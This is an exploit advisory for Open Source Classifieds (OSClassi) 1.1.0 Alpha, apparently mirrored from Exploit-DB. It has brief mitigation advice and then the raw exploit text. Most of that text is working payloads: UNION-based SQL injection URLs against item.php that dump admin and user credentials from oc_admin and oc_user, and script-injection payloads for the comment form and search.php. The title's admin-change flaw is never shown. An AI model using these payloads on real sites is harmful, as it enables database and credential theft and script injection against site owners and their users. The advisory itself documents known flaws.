Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities

vendor:

Open Source Classifieds (OSClassi)

by:

Sioma Labs

7.5

CVSS

HIGH

SQL Injection, Cross-Site Scripting (XSS)

89, 79

CWE

Product Name: Open Source Classifieds (OSClassi)

Affected Version From: 1.1.0 Alpha

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2 (WAMP)

Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities

The vulnerability allows an attacker to perform SQL injection attacks and cross-site scripting attacks on the OSClassi website. The SQL injection vulnerability allows an attacker to execute arbitrary SQL commands, potentially gaining unauthorized access to the database. The XSS vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users.

Mitigation:

To mitigate the SQL injection vulnerability, developers should use parameterized queries or prepared statements to prevent user-supplied input from being executed as SQL commands. To mitigate the XSS vulnerability, developers should properly sanitize and validate user input before displaying it on web pages.

Source

Exploit-DB raw data:

 __ _                           __       _         
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___ 
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
========================================================================================
Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities
----------------------------------------------------------------------------------------
- Site 		: http://osclass.org/                                                   
- Download  : http://sourceforge.net/projects/osclass/files/
- Author 	: Sioma Labs
- Version 	: 1.1.0 Alpha
- Tested on : WIndows XP SP2 (WAMP)

[-------------------------------------------------------------------------------------------------------------------------]

MYSQL Injection 
===============
POC
http://server/item.php?id=[SQLi]

Basic Info
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--

Admin ID,Username,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--

User ID,UserName,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--

[-------------------------------------------------------------------------------------------------------------------------]
Cross Site Scripting
====================

Xss Source Review (item.php)
------------------------------

1st Xss item.php 
[+]  To Work This You need to Have A iteam already posted (http://server/item.php?action=post)
------------------------------
	case 'add_comment':
		dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')", 
			DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
		header('Location: item.php?id=' . $_POST['id']);
		break;
	case 'post':
------------------------------

[+] Put This c0de in to the comment box
"><script>alert(String.fromCharCode(88, 83, 83));</script>

-------------------------------

2nd Xss (search.php)
---------------------------------
$pattern = $_GET['pattern'];
--------------------------------

POC
http://server/search.php?pattern=[Xss]
Exploit
http://server/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>

[-------------------------------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------------------------------]
# http://siomalabs.com [Sioma Labs]
# Sioma Agent 154